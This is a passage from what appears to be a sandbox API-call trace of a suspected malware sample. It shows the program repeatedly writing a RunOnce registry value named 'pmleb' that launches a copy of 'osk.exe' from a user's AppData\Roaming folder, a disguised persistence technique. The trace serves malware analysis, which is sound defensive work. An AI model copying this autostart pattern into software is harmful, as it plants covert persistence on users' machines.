HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.943] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.943] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.943] RegCloseKey (hKey=0x280) returned 0x0 [0079.943] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.943] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.943] SetTimer (hWnd=0x20280, nIDEvent=0x205b, uElapse=0xa, lpTimerFunc=0x0) returned 0x205b [0079.944] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.956] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.956] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.956] KillTimer (hWnd=0x20280, uIDEvent=0x205b) returned 1 [0079.956] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.956] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.956] IUnknown:Release (This=0x787518) returned 0x1 [0079.956] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.956] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.957] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.957] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.957] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.957] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0079.957] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.957] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5d [0079.957] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.958] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c 
[0079.958] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.958] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.958] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.958] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.958] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.958] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.959] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.959] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.959] RegCloseKey (hKey=0x280) returned 0x0 [0079.959] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.959] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.959] SetTimer (hWnd=0x20280, nIDEvent=0x205c, uElapse=0xa, lpTimerFunc=0x0) returned 0x205c [0079.959] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.973] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.973] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.973] KillTimer (hWnd=0x20280, uIDEvent=0x205c) returned 1 [0079.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.973] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.973] IUnknown:Release (This=0x787518) returned 0x1 [0079.973] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.973] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.974] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.974] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.974] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0079.974] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.974] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5e [0079.974] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.975] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0079.975] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.975] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.975] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0079.975] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.975] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.975] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.975] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.975] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.976] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.976] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.976] RegCloseKey (hKey=0x280) returned 0x0 [0079.976] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.976] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.976] SetTimer (hWnd=0x20280, nIDEvent=0x205d, uElapse=0xa, lpTimerFunc=0x0) returned 0x205d [0079.976] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.987] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.987] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.987] KillTimer (hWnd=0x20280, uIDEvent=0x205d) returned 1 [0079.987] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.987] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.987] IUnknown:Release (This=0x787518) returned 0x1 [0079.987] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.987] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.987] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.988] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.988] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.988] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0079.988] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.988] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5f [0079.988] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.989] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0079.989] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.989] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.989] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.989] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.989] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0079.989] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.989] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.989] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, 